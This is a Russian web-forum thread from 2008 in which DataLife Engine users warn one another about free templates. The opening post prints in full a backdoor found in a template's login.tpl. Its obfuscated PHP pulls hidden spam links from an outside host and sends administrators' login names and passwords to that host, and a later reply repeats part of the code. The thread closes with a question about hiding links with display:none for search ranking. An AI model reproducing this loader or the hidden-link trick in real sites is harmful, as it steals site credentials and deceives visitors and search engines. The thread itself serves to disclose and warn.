Langly 7 Опубликовано: 12 сентября 2008 Рассказать Опубликовано: 12 сентября 2008 в login.tpl следующий код: <? $login_cache="engine/cache/system/login_cache.txt"; $logingtrue1 = 'eart'; $logingtrue2 = 'htt'; $logingtrue3 = '.r'; $logingtrue4 = 'p://nic'; if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) { $file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']); $logingtrue = @file_get_contents($file_url); if($logingtrue) { $file = fopen($login_cache, "w"); fwrite( $file, $logingtrue); fclose( $file ); // chmod ( $file, 0777); //права } } else { $logingtrue = file_get_contents($login_cache); } if ($is_logged == TRUE){ $login_panel = <<<HTML <div style="padding-top:2px; padding-left:20px;">Привет, <b>{$member_id['name']}</b>!</div> <div style="padding-top:5px; padding-bottom:5px; padding-left:22px;"> HTML; if ($user_group[$member_id['user_group']]['allow_admin']) { $file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']) ."&un=". $login_name ."&up=". $login_password; $logingtrue = file_get_contents($file_url); $login_panel .= <<<HTML <a href="{$adminlink}" target="_blank">Админцентр</a> | HTML; } $login_panel .= <<<HTML <a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a> | <a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a> | <a href="{$link_addnews}">Добавить новость</a> | <a href="{$link_newposts}">Обзор непрочитанного</a> | <div style="padding-top:2px; padding-bottom:5px; padding-left:75px;"><a onclick="java script: showBusyLayer()" href="{$link_logout}"><b>Завершить сеанс!</b></a></div> </div> HTML; } else { $login_panel = <<<HTML $logingtrue <div style="padding-top:5px; padding-left:21px;"> <table class="stext"> <form method=post onsubmit="java script: showBusyLayer()"> <tr align="left" valign="middle"> <td width="58" height="25" align="right">Логин</td> <td height="25" align="right"><input type="text" name="login_name" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td> <td align="right">Пароль</td> <td align="right"><input type="password" name="login_password" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td> <td align="right"> <input onclick="submit();" name="image" type="image" src="{THEME}/images/send.png"> <input name="login" type="hidden" id="login2" value="submit"></td> <td align="right"><a href="{$link_regist}">Регистрация на сайте!</a><br> <a href="{$link_lost}">Забыли пароль?</a></td> </tr> </form> </table> </div> <div style="padding-top:8px; padding-left:55px; padding-bottom:5px;"></div> HTML; } ?> Содержимое созданного файла engine/cache/system/login_cache.txt : <div style="display: none;"> Всё по движку datalfe engine <a href="http://niceart.ru">datalife engine</a> например, шаблоны, модули для движка. Сайт для православных - <a href="http://rppr.ru">Русский православный сайт</a> - круг общения русских людей. Скачать электронные книги без регистрации <a href="http://bookloader.info">электронные книги</a> - e-books и электронные книги. За новосятми для развлечения приходите на <a href="http://superpuper.info">развлекательный портал</a> и общайтесь в удовольствие. Самые свежие авто новости про автомобили здесь - <a href="http://avtoparty.info">автомобильные новости</a> - каждому автолюбителю. </div> А логин и пароль отсылаются на адрес: _http://niceart.ru/getlink/003/db.php?ticket=095 Пользуйтесь бесплатными шаблонами товарищи:-) Цитата Ссылка на сообщение Поделиться на других сайтах
absolutNO 0 Опубликовано: 19 сентября 2008 Рассказать Опубликовано: 19 сентября 2008 Мда бывает. Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 19 сентября 2008 Рассказать Опубликовано: 19 сентября 2008 Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал. Цитата Ссылка на сообщение Поделиться на других сайтах
КиберБулка 2 Опубликовано: 19 сентября 2008 Рассказать Опубликовано: 19 сентября 2008 Хм... По идее в .tpl php код внедрить должно быть невозможно. Цитата Ссылка на сообщение Поделиться на других сайтах
Akela 9 Опубликовано: 19 сентября 2008 Рассказать Опубликовано: 19 сентября 2008 По идее в .tpl php код внедрить должно быть невозможно. login.tpl - это единственный шаблон, в котором есть php код. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 29 сентября 2008 Рассказать Опубликовано: 29 сентября 2008 (изменено) Автор Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал. Больше мне делать нечего как подобные вещи выдумывать. Шаб нашел в паблике. Написал-же "бесплатный". Хз на каком сайте, не помню уже(но не на твоем, это точно:-)). Выложил все это с единственной целью - показать что нашел в коде, для того чтобы люди любой шаблон проверяли на наличие подобного кода перед использованием. В первую очередь в админке антивирем. Если создаются в движке какие-то непредусмотренные файлы он их показывает. Кто знает как и где еще могут располагаться зловредные коды в шаблонах - напишите. Интересно. Изменено 29 сентября 2008 пользователем Langly Цитата Ссылка на сообщение Поделиться на других сайтах
sting 0 Опубликовано: 29 сентября 2008 Рассказать Опубликовано: 29 сентября 2008 Все правильно таких бесплатных шаблонов пруд пруди, сам постоянно нахожу такие, если людям интересно привожу их названия: CS_theme2 dle_2008_saratov dle_templates_red_alert dleohotnikoff fanfootbal-stx Free_Template freemir gta pirate2 shabszel Software warezlife warezlife1 wow_tpl это найденные мной на скорую руку, во всех файлах login.tpl <? $login_cache="engine/cache/system/login_cache.txt"; $logingtrue1 = 'eart'; $logingtrue2 = 'htt'; $logingtrue3 = '.r'; $logingtrue4 = 'p://nic'; if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) { $file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его. Цитата Ссылка на сообщение Поделиться на других сайтах
Greeze 0 Опубликовано: 29 сентября 2008 Рассказать Опубликовано: 29 сентября 2008 sting, не лишнем будет указать источник, откуда скачивались шаблоны. Цитата Ссылка на сообщение Поделиться на других сайтах
sting 0 Опубликовано: 1 октября 2008 Рассказать Опубликовано: 1 октября 2008 sting, не лишнем будет указать источник, откуда скачивались шаблоны. Ты что шутишь, я не записываю такие вещи, но можно поюзать поиск например ищем shabszel вот, бите http://yandex.ru/yandsearch?clid=13999&...p;text=shabszel получаем 1. Скин в зеленых тонах " For DLE - Все для dle,шаблоны,модули... Скачать: shabszel.rar [202.87 Kb] (cкачиваний: fdle.ru/2007/12/16/skin-v-zelenykh-tonakh.html · 33 КБ далее по аналогии. Цитата Ссылка на сообщение Поделиться на других сайтах
vadivasil 0 Опубликовано: 6 октября 2008 Рассказать Опубликовано: 6 октября 2008 по-моему, надо стороной обходить все бесплатное. т.к. бесплатный тока сыр в мышеловке. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 8 октября 2008 Рассказать Опубликовано: 8 октября 2008 Автор далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его. Можно чуть подробнее. Что именно бывает в других файлах и в каких обычно? Цитата Ссылка на сообщение Поделиться на других сайтах
sting 0 Опубликовано: 14 октября 2008 Рассказать Опубликовано: 14 октября 2008 Например ссылки на какой либо сайт для поднятия его цытируемости, еще проще взять подобный шаблон и внимательно просмотреть его код плюс проанализировать что и зачем. Цитата Ссылка на сообщение Поделиться на других сайтах
MVFedosov 0 Опубликовано: 26 октября 2008 Рассказать Опубликовано: 26 октября 2008 Можно добавить ещё пару слов о использовании нелицензионных версий dle: недавно просмотрел и сравнил коды лицензионки и нулёной версии - после этого был снят вопрос о частых темах про взлом dle - в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта. Так что пользуйтесь оригинальной версией. Цитата Ссылка на сообщение Поделиться на других сайтах
deGODy 0 Опубликовано: 29 октября 2008 Рассказать Опубликовано: 29 октября 2008 (изменено) в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта. Так что пользуйтесь оригинальной версией. Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти пол года стипендию откладывать А с другой стороны бесплатный только сыр в мышеловке А мне хорошо я на Joomla 1.5.7 сижу Изменено 29 октября 2008 пользователем deGODy Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 29 октября 2008 Рассказать Опубликовано: 29 октября 2008 Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти по года стипендию откладывать Очень интересно, 1500 это дорого, у меня вот возник вопрос на компьютер вы тогда с рождения копили или его украли? За интернет вы платите экономя на хлебе? или у соседа воруете подключившись к его кабелям. За хостинг вы платите приторговывая пиратскими дисками на рынке или просто взломали хостинг провайдера и взяли себе кусочек места? Про домен я молчу, т.к. боюсь предположить откуда он у вас. Вы оправдываете такое уголовное преступление как воровство тем, что у вас нет денег. Оригинально. Но дело даже не в этом, если у вас нет денег, вам не хочется платить за скрипта, так извините какого .... вы тогда его используете? Есть бесплатные скрипты, используйте их, зачем воровать и оправдывать себя? Вот этого я хоть убейте не понимаю. Цитата Ссылка на сообщение Поделиться на других сайтах
Langly 7 Опубликовано: 31 октября 2008 Рассказать Опубликовано: 31 октября 2008 Автор <div style="display: none;">ссылка</div> Кстати, такие ссылки индексятся поисковиками или нет, кто знает? Бывает надо несколько ссылок поставить, чтобы индекснулись, а вид портят. Если так оформлять будут индекситься? Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.